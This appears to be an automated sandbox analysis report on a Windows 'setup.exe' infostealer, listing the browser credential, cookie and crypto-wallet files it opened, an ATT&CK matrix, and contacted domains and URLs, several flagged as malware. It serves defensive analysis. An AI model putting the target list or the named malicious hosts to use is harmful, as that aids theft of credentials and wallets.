Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\setup.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1417442248.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: setup.exe PID: 5916, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: setup.exe PID: 5916, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix (the number in front of a technique is the count displayed beside it in the original matrix):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 221 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 221 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 22 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
--- | --- | --- | ---
setup.exe | 16% | ReversingLabs | Win32.Infostealer.Generic

No Antivirus matches
Source | Detection | Scanner | Label
--- | --- | --- | ---
https://fairiespar.cyou/api | 0% | Avira URL Cloud | safe
https://klipvumisui.shop/c& | 100% | Avira URL Cloud | malware
https://fairiespar.cyou:443/api | 0% | Avira URL Cloud | safe
https://fairiespar.cyou:443/apiocal | 0% | Avira URL Cloud | safe
https://fairiespar.cyou/:z | 0% | Avira URL Cloud | safe
https://klipvumisui.shop:443/int_clp_sha.txtg0lh | 100% | Avira URL Cloud | malware
https://klipvumisui.shop:443/int_clp_sha.txt | 100% | Avira URL Cloud | malware
Http://Www.SkyGz.Com | 0% | Avira URL Cloud | safe
https://fairiespar.cyou/Cert | 0% | Avira URL Cloud | safe
https://fairiespar.cyou/hortp | 0% | Avira URL Cloud | safe
https://fairiespar.cyou/XBWQPea | 0% | Avira URL Cloud | safe
https://cegu.shop/8574262446/ph.txt? | 100% | Avira URL Cloud | malware
https://fairiespar.cyou/ | 0% | Avira URL Cloud | safe
https://fairiespar.cyou/pi | 0% | Avira URL Cloud | safe
https://fairiespar.cyou/let_ | 0% | Avira URL Cloud | safe
fairiespar.cyou | 0% | Avira URL Cloud | safe
https://klipvumisui.shop/int_clp_sha.txtIe | 100% | Avira URL Cloud | malware
https://fairiespar.cyou/apiers | 0% | Avira URL Cloud | safe
https://fairiespar.cyou:443/apiws | 0% | Avira URL Cloud | safe
https://fairiespar.cyou/w | 0% | Avira URL Cloud | safe
https://klipvumisui.shop/) | 100% | Avira URL Cloud | malware
https://fairiespar.cyou/u | 0% | Avira URL Cloud | safe
https://dfgh.online/invoker.php?compName=hZ | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
cegu.shop | 185.161.251.21 | true | false | | high
fairiespar.cyou | 188.114.97.3 | true | true | | unknown
klipvumisui.shop | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
https://fairiespar.cyou/api | true | Avira URL Cloud: safe | unknown
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
nearycrepso.shop | false | | high
https://cegu.shop/8574262446/ph.txt | false | | high
fairiespar.cyou | true | Avira URL Cloud: safe | unknown
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://cegu.shop:443/8574262446/ph.txt | setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fairiespar.cyou:443/api | setup.exe | false | Avira URL Cloud: safe | unknown
https://klipvumisui.shop:443/int_clp_sha.txt | setup.exe | false | Avira URL Cloud: malware | unknown
https://klipvumisui.shop:443/int_clp_sha.txtg0lh | setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://klipvumisui.shop/c& | setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cegu.shop/ | setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dfgh.online/invoker.php?compName= | powershell.exe, 0000000A.00000002.1515220136.0000000005380000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.starfieldtech.com/0D | setup.exe | false | | high
https://fairiespar.cyou/Cert | setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fairiespar.cyou:443/apiocal | setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | setup.exe | false | | high
https://aka.ms/pscore6lB | powershell.exe, 0000000A.00000002.1515220136.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1515220136.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://fairiespar.cyou/hortp | setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1400809409.0000000003E6C000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417974487.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413835147.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1429890611.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413619922.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1418330853.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1400573113.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413958336.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe |
                                                              unknown
                                                              https://fairiespar.cyou/:zsetup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crl.starfieldtech.com/repository/sfsroot.crl0Psetup.exefalse
                                                                high
                                                                https://support.mozilla.org/products/firefoxgro.allsetup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.1515220136.0000000004ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    Http://Www.SkyGz.Comsetup.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://klipvumisui.shop/int_clp_sha.txtsetup.exe, 00000000.00000002.1508611151.0000000000867000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.innosetup.com/setup.exefalse
                                                                        high
                                                                        https://fairiespar.cyou/setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://fairiespar.cyou/apierssetup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
